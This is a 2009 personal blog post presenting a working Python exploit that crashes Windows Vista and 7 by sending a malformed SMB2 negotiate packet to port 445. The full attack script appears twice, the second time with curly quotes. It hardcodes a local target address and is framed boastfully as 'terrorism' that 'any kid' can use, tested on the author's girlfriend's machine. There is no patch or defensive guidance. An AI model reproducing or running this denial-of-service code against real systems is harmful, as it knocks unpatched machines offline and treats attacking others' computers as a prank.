Bruno's blog

09 Sep 09 Windows Vista/7 terrorism in 30 lines of Python

Any kid can hack Vista/7 and make it shutdown with 30 lines of python code.

I just tested this in a stock Ubuntu 9.04 installation targetting my girl’s poor Windows 7 machine and it was total anihilation:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
# it dies with a PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
from socket import *

host = "10.1.1.101", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"         # Process ID High: --> :)  normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()

s.connect(host)
s.send(buff)
s.close()

Save.py
./execute
Result:

Windows Vista/7 BSDO madness

Windows Vista/7 BSDO madness

If you can’t use this you shouldn’t be trying to.

# When SMB2.0 recieve a “&” char in the “Process Id High” SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
from socket import *

host = “10.1.1.101″, 445
buff = (
“\x00\x00\x00\x90″ # Begin SMB header: Session message
“\xff\x53\x4d\x42″ # Server Component: SMB
“\x72\x00\x00\x00″ # Negociate Protocol
“\x00\x18\x53\xc8″ # Operation 0×18 & sub 0xc853
“\x00\x26″# Process ID High: –> :) normal value should be “\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe”
“\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54″
“\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31″
“\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00″
“\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57″
“\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61″
“\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c”
“\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c”
“\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e”
“\x30\x30\x32\x00″

)
s = socket()

s.connect(host)
s.send(buff)
s.close()

Categoria misc
« Updated blog, domains and started some projects
Propero CMS launched »


Add a comment

sidebartop

Bruno Cassol


I'm a young Brazilian web developer that's finishing Computer Science course. Author of Propero CMS and co-author of ZenBuntu blog.

Tags: God, family, fishing, table-tennis, weight-lifting, swimming, PHP, MySQL, LessCSS, CMS, Open source, Linux, Ubuntu.

God is always present in my life. Have a nice day.

More about me at brunocassol.com

sidebarbottom
sidebartop

Categories

sidebarbottom
sidebartop

Recent posts

sidebarbottom
sidebartop

Recent Comments

sidebarbottom
sidebartop

Twitter

sidebarbottom
sidebartop

Links

sidebarbottom
© 2008-2010 http://www.brunocassol.com/blog Bruno's blog